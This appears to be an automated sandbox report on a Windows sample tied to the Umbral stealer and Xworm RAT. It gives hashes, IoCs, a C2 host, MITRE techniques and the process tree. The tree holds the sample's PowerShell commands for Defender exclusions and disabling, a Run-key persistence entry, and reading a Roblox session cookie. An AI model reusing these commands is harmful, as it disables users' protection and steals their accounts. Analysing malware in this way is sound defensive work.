umbral | 6060fb48cc4a123bb9a64f8854f8c5253dc125194469f2e4b0821d4248f14c3c

Analysis

max time kernel
307s
max time network
312s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
25-02-2024 05:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IO tootls.exe
Size

207KB
MD5

5afd3e0ac701a47f48772af3c5eb54d1
SHA1

ac20c5db48d258c9f00845fb3508e90d4f3187ae
SHA256

6060fb48cc4a123bb9a64f8854f8c5253dc125194469f2e4b0821d4248f14c3c
SHA512

24329cf850d5578c13799f093394c619ece7c0ba36a79fc57084e9c1da38d119e39bc27e5e91de12c1426bf1fe7131060ce3a20fc566d90525a99e4da914337b
SSDEEP

6144:rJX6OJ0PS7eEcJWIUPjw7B5oZKH4FIlhuc4w1VVcKGwO9t:94SqE4q7coY4ShucV43

Score

10^/10

umbral xworm persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

hai1723rat-60039.portmap.io:60039

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral3/files/0x0007000000023224-48.dat	family_umbral
behavioral3/memory/1072-59-0x000001EA7F710000-0x000001EA7F75E000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x0006000000023223-36.dat	family_xworm
behavioral3/memory/4996-60-0x00000000001A0000-0x00000000001C6000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	controllloader.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation	systemload.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation	IO tootls.exe

Executes dropped EXE 2 IoCs

pid	Process
4996	systemload.exe
1072	controllloader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updatee = "C:\\Windows\\.NET\\netloader.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
51	discord.com
52	discord.com
84	raw.githubusercontent.com
85	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp"	systemload.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2192 set thread context of 1192	2192	IO tootls.exe	93

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\.NET\netloader.exe	IO tootls.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1512	wmic.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000_Classes\Local Settings	systemload.exe
Key created	\REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1600	WINWORD.EXE
1600	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
64	powershell.exe
64	powershell.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
1192	IO tootls.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
2620	powershell.exe
2620	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
2620	powershell.exe
4408	powershell.exe
4408	powershell.exe
1732	powershell.exe
1732	powershell.exe
4408	powershell.exe
1732	powershell.exe
4996	systemload.exe
4008	powershell.exe
4008	powershell.exe
4036	powershell.exe
4036	powershell.exe
4856	powershell.exe
4856	powershell.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe
4996	systemload.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	1192	IO tootls.exe
Token: SeDebugPrivilege	1072	controllloader.exe
Token: SeDebugPrivilege	4996	systemload.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	2620	powershell.exe
Token: SeDebugPrivilege	4696	powershell.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	4996	systemload.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeIncreaseQuotaPrivilege	4244	wmic.exe
Token: SeSecurityPrivilege	4244	wmic.exe
Token: SeTakeOwnershipPrivilege	4244	wmic.exe
Token: SeLoadDriverPrivilege	4244	wmic.exe
Token: SeSystemProfilePrivilege	4244	wmic.exe
Token: SeSystemtimePrivilege	4244	wmic.exe
Token: SeProfSingleProcessPrivilege	4244	wmic.exe
Token: SeIncBasePriorityPrivilege	4244	wmic.exe
Token: SeCreatePagefilePrivilege	4244	wmic.exe
Token: SeBackupPrivilege	4244	wmic.exe
Token: SeRestorePrivilege	4244	wmic.exe
Token: SeShutdownPrivilege	4244	wmic.exe
Token: SeDebugPrivilege	4244	wmic.exe
Token: SeSystemEnvironmentPrivilege	4244	wmic.exe
Token: SeRemoteShutdownPrivilege	4244	wmic.exe
Token: SeUndockPrivilege	4244	wmic.exe
Token: SeManageVolumePrivilege	4244	wmic.exe
Token: 33	4244	wmic.exe
Token: 34	4244	wmic.exe
Token: 35	4244	wmic.exe
Token: 36	4244	wmic.exe
Token: SeIncreaseQuotaPrivilege	4244	wmic.exe
Token: SeSecurityPrivilege	4244	wmic.exe
Token: SeTakeOwnershipPrivilege	4244	wmic.exe
Token: SeLoadDriverPrivilege	4244	wmic.exe
Token: SeSystemProfilePrivilege	4244	wmic.exe
Token: SeSystemtimePrivilege	4244	wmic.exe
Token: SeProfSingleProcessPrivilege	4244	wmic.exe
Token: SeIncBasePriorityPrivilege	4244	wmic.exe
Token: SeCreatePagefilePrivilege	4244	wmic.exe
Token: SeBackupPrivilege	4244	wmic.exe
Token: SeRestorePrivilege	4244	wmic.exe
Token: SeShutdownPrivilege	4244	wmic.exe
Token: SeDebugPrivilege	4244	wmic.exe
Token: SeSystemEnvironmentPrivilege	4244	wmic.exe
Token: SeRemoteShutdownPrivilege	4244	wmic.exe
Token: SeUndockPrivilege	4244	wmic.exe
Token: SeManageVolumePrivilege	4244	wmic.exe
Token: 33	4244	wmic.exe
Token: 34	4244	wmic.exe
Token: 35	4244	wmic.exe
Token: 36	4244	wmic.exe
Token: SeIncreaseQuotaPrivilege	1936	wmic.exe
Token: SeSecurityPrivilege	1936	wmic.exe
Token: SeTakeOwnershipPrivilege	1936	wmic.exe
Token: SeLoadDriverPrivilege	1936	wmic.exe
Token: SeSystemProfilePrivilege	1936	wmic.exe
Token: SeSystemtimePrivilege	1936	wmic.exe
Token: SeProfSingleProcessPrivilege	1936	wmic.exe
Token: SeIncBasePriorityPrivilege	1936	wmic.exe
Token: SeCreatePagefilePrivilege	1936	wmic.exe
Token: SeBackupPrivilege	1936	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe
3976	msedge.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
4996	systemload.exe
1600	WINWORD.EXE
1600	WINWORD.EXE
1600	WINWORD.EXE
1600	WINWORD.EXE
1600	WINWORD.EXE
1600	WINWORD.EXE
1600	WINWORD.EXE
4044	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2192 wrote to memory of 64	2192	IO tootls.exe	91
PID 2192 wrote to memory of 64	2192	IO tootls.exe	91
PID 2192 wrote to memory of 64	2192	IO tootls.exe	91
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 2192 wrote to memory of 1192	2192	IO tootls.exe	93
PID 1192 wrote to memory of 4996	1192	IO tootls.exe	96
PID 1192 wrote to memory of 4996	1192	IO tootls.exe	96
PID 1192 wrote to memory of 1072	1192	IO tootls.exe	97
PID 1192 wrote to memory of 1072	1192	IO tootls.exe	97
PID 1192 wrote to memory of 872	1192	IO tootls.exe	98
PID 1192 wrote to memory of 872	1192	IO tootls.exe	98
PID 1192 wrote to memory of 872	1192	IO tootls.exe	98
PID 872 wrote to memory of 4484	872	cmd.exe	100
PID 872 wrote to memory of 4484	872	cmd.exe	100
PID 872 wrote to memory of 4484	872	cmd.exe	100
PID 1072 wrote to memory of 4696	1072	controllloader.exe	101
PID 1072 wrote to memory of 4696	1072	controllloader.exe	101
PID 4996 wrote to memory of 2620	4996	systemload.exe	102
PID 4996 wrote to memory of 2620	4996	systemload.exe	102
PID 1072 wrote to memory of 4408	1072	controllloader.exe	105
PID 1072 wrote to memory of 4408	1072	controllloader.exe	105
PID 4996 wrote to memory of 1732	4996	systemload.exe	107
PID 4996 wrote to memory of 1732	4996	systemload.exe	107
PID 1072 wrote to memory of 4008	1072	controllloader.exe	110
PID 1072 wrote to memory of 4008	1072	controllloader.exe	110
PID 1072 wrote to memory of 4036	1072	controllloader.exe	111
PID 1072 wrote to memory of 4036	1072	controllloader.exe	111
PID 1072 wrote to memory of 4244	1072	controllloader.exe	115
PID 1072 wrote to memory of 4244	1072	controllloader.exe	115
PID 1072 wrote to memory of 1936	1072	controllloader.exe	117
PID 1072 wrote to memory of 1936	1072	controllloader.exe	117
PID 1072 wrote to memory of 1508	1072	controllloader.exe	119
PID 1072 wrote to memory of 1508	1072	controllloader.exe	119
PID 1072 wrote to memory of 4856	1072	controllloader.exe	121
PID 1072 wrote to memory of 4856	1072	controllloader.exe	121
PID 1072 wrote to memory of 1512	1072	controllloader.exe	123
PID 1072 wrote to memory of 1512	1072	controllloader.exe	123
PID 4996 wrote to memory of 3976	4996	systemload.exe	139
PID 4996 wrote to memory of 3976	4996	systemload.exe	139
PID 3976 wrote to memory of 3772	3976	msedge.exe	140
PID 3976 wrote to memory of 3772	3976	msedge.exe	140
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141
PID 3976 wrote to memory of 4928	3976	msedge.exe	141

C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
"C:\Users\Admin\AppData\Local\Temp\IO tootls.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'updatee' -Value '"C:\Windows\.NET\netloader.exe"' -PropertyType 'String'
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:64
- C:\Users\Admin\AppData\Local\Temp\IO tootls.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1192
- - C:\Users\Admin\AppData\Local\Temp\systemload.exe
    "C:\Users\Admin\AppData\Local\Temp\systemload.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemload.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1732
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3976
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9e87e46f8,0x7ff9e87e4708,0x7ff9e87e4718
        5⤵
        
        PID:3772
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        5⤵
        
        PID:4928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        
        PID:1892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
        5⤵
        
        PID:1692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        
        PID:1324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        5⤵
        
        PID:2264
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8
        5⤵
        
        PID:916
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8
        5⤵
        
        PID:4296
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
        5⤵
        
        PID:1296
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
        5⤵
        
        PID:3228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
        5⤵
        
        PID:4208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9789564649717684037,4468277103417663290,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
        5⤵
        
        PID:5012
- - C:\Users\Admin\AppData\Local\Temp\controllloader.exe
    "C:\Users\Admin\AppData\Local\Temp\controllloader.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\controllloader.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4036
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4244
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1936
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4856
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4484

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1600

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4044

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IO tootls.exe.log

Filesize
321B

MD5
baf5d1398fdb79e947b60fe51e45397f

SHA1
49e7b8389f47b93509d621b8030b75e96bb577af

SHA256
10c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8

SHA512
b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413

Download Submit
